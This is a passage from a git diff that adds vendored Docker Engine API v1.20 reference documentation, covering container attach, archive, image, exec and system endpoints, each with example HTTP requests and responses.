SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.20/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.20/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.20/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. + Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Deprecated** in favor of the `archive` endpoint below. + +**Example request**: + + POST /v1.20/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Retrieving information about files and folders in a container + +`HEAD /containers/(id or name)/archive` + +See the description of the `X-Docker-Container-Path-Stat` header in the +following section. + +#### Get an archive of a filesystem resource in a container + +`GET /containers/(id or name)/archive` + +Get a tar archive of a resource in the filesystem of container `id`. + +**Query parameters**: + +- **path** - resource in the container's filesystem to archive. Required. + + If not an absolute path, it is relative to the container's root directory. + The resource specified by **path** must exist. To assert that the resource + is expected to be a directory, **path** should end in `/` or `/.` + (assuming a path separator of `/`). If **path** ends in `/.` then this + indicates that only the contents of the **path** directory should be + copied. A symlink is always resolved to its target. + + > **Note**: It is not possible to copy certain system files such as resources + > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the + > container. + +**Example request**: + + GET /v1.20/containers/8cce319429b2/archive?path=/root HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0= + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +On success, a response header `X-Docker-Container-Path-Stat` will be set to a +base64-encoded JSON object containing some filesystem header information about +the archived resource. The above example value would decode to the following +JSON object (whitespace added for readability): + +```json +{ + "name": "root", + "size": 4096, + "mode": 2147484096, + "mtime": "2014-02-27T20:51:23Z", + "linkTarget": "" +} +``` + +A `HEAD` request can also be made to this endpoint if only this information is +desired. + +**Status codes**: + +- **200** - success, returns archive of copied resource +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** was asserted to be a directory but exists as a + file) +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** does not exist) +- **500** - server error + +#### Extract an archive of files or folders to a directory in a container + +`PUT /containers/(id or name)/archive` + +Upload a tar archive to be extracted to a path in the filesystem of container +`id`. + +**Query parameters**: + +- **path** - path to a directory in the container + to extract the archive's contents into. Required. + + If not an absolute path, it is relative to the container's root directory. + The **path** resource must exist. +- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error + if unpacking the given content would cause an existing directory to be + replaced with a non-directory and vice versa. + +**Example request**: + + PUT /v1.20/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1 + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – the content was extracted successfully +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** should be a directory but exists as a file) + - unable to overwrite existing directory with non-directory + (if **noOverwriteDirNonDir**) + - unable to overwrite existing non-directory with directory + (if **noOverwriteDirNonDir**) +- **403** - client error, permission denied, the volume + or container rootfs is marked as read-only. +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** resource does not exist) +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.20/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest information**: + + GET /v1.20/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.20/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the `Dockerfile`. This is + ignored if `remote` is specified and points to an external `Dockerfile`. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. If + the URI points to a tarball, the file is downloaded by the daemon and + the contents therein used as the context for the build. If the URI + points to a tarball and the `dockerfile` parameter is also specified, + there must be a file with the corresponding path inside the tarball. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. +- **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON + object with the following structure: + + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + + This object maps the hostname of a registry to an object containing the + "username" and "password" for that registry. Multiple registries may + be specified as the build may be based on an image requiring + authentication to pull from any arbitrary registry. Only the registry + domain name (and port if not the default "443") are required. However + (for legacy reasons) the "official" Docker, Inc. hosted registry must + be specified with both a "https://" prefix and a "/v1/" suffix even + though Docker will prefer to use the v2 registry API. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.20/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. +- **repo** – Repository name. +- **tag** – Tag. If empty when pulling an image, this causes all tags + for the given image to be pulled. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.20/images/ubuntu/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Created": "2013-03-23T22:24:18.818426-07:00", + "Container": "3d67245a8d72ecf13f33dffac9f79dcdf70f75acb84d308770391510e0c23ad0", + "ContainerConfig": { + "Hostname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": true, + "OpenStdin": true, + "StdinOnce": false, + "Env": null, + "Cmd": ["/bin/bash"], + "Dns": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": null, + "VolumesFrom": "", + "WorkingDir": "" + }, + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Parent": "27cf784147099545", + "Size": 6824592 + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.20/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + "ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/", + "Tags": null, + "Size": 0, + "Comment": "" + }, + { + "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158", + "Created": 1371157430, + "CreatedBy": "", + "Tags": [ + "scratch12:latest", + "scratch:latest" + ], + "Size": 0, + "Comment": "Imported from -" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.20/images/test/push HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}} + {"error": "Invalid..."} + ... + +If you wish to push an image on to a private registry, that image must already have a tag +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +**Example request**: + + POST /v1.20/images/registry.acme.com:5000/test/push HTTP/1.1 + + +**Query parameters**: + +- **tag** – The tag to associate with the image on the registry. This is optional. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object. + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.20/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **force** – 1/True/true or 0/False/false, default false +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.20/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. + +**Example request**: + + GET /v1.20/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "wma55/u1210sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "jdswinbank/sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "vgauthier/sshd", + "star_count": 0 + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Get the default username and email + +**Example request**: + + POST /v1.20/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "email": "hannibal@a-team.com", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.20/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Containers": 11, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelVersion": "3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OperatingSystem": "Boot2Docker", + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "SwapLimit": false, + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.20/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.5.0", + "Os": "linux", + "KernelVersion": "3.18.5-tinycore64", + "GoVersion": "go1.4.1", + "GitCommit": "a8a31ef", + "Arch": "amd64", + "ApiVersion": "1.20", + "Experimental": false + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.20/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.20/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ], + "Labels": { + "key1": "value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") +- **pause** – 1/True/true or 0/False/false, whether to pause the container before committing +- **changes** – Dockerfile instructions to apply while committing + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause + +Docker images report the following events: + + delete, import, pull, push, tag, untag + +**Example request**: + + GET /v1.20/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "create", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "start", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "stop", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067966} + {"status": "destroy", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067970} + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.20/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.20/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.20/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. + +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "Tty": true, + "User": "123:456" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. +- **User** - A string value specifying the user, and optionally, group to run + the exec process inside the container. Format is one of: `"user"`, + `"user:group"`, `"uid"`, or `"uid:gid"`. + +**Status codes**: + +- **201** – no error +- **404** – no such container + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.20/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.20/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. + +**Example request**: + + GET /v1.20/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: plain/text + + { + "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39", + "Running" : false, + "ExitCode" : 2, + "ProcessConfig" : { + "privileged" : false, + "user" : "", + "tty" : false, + "entrypoint" : "sh", + "arguments" : [ + "-c", + "exit 2" + ] + }, + "OpenStdin" : false, + "OpenStderr" : false, + "OpenStdout" : false, + "Container" : { + "State" : { + "Running" : true, + "Paused" : false, + "Restarting" : false, + "OOMKilled" : false, + "Pid" : 3650, + "ExitCode" : 0, + "Error" : "", + "StartedAt" : "2014-11-17T22:26:03.717657531Z", + "FinishedAt" : "0001-01-01T00:00:00Z" + }, + "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c", + "Created" : "2014-11-17T22:26:03.626304998Z", + "Path" : "date", + "Args" : [], + "Config" : { + "Hostname" : "8f177a186b97", + "Domainname" : "", + "User" : "", + "AttachStdin" : false, + "AttachStdout" : false, + "AttachStderr" : false, + "ExposedPorts" : null, + "Tty" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ], + "Cmd" : [ + "date" + ], + "Image" : "ubuntu", + "Volumes" : null, + "WorkingDir" : "", + "Entrypoint" : null, + "NetworkDisabled" : false, + "MacAddress" : "", + "OnBuild" : null, + "SecurityOpt" : null + }, + "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5", + "NetworkSettings" : { + "IPAddress" : "172.17.0.2", + "IPPrefixLen" : 16, + "MacAddress" : "02:42:ac:11:00:02", + "Gateway" : "172.17.42.1", + "Bridge" : "docker0", + "PortMapping" : null, + "Ports" : {} + }, + "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf", + "HostnamePath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname", + "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Name" : "/test", + "Driver" : "aufs", + "ExecDriver" : "native-0.2", + "MountLabel" : "", + "ProcessLabel" : "", + "AppArmorProfile" : "", + "RestartCount" : 0, + "Mounts" : [] + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all, +default or blank means CORS disabled + + $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/v1.21.md b/vendor/github.com/docker/docker/docs/api/v1.21.md new file mode 100644 index 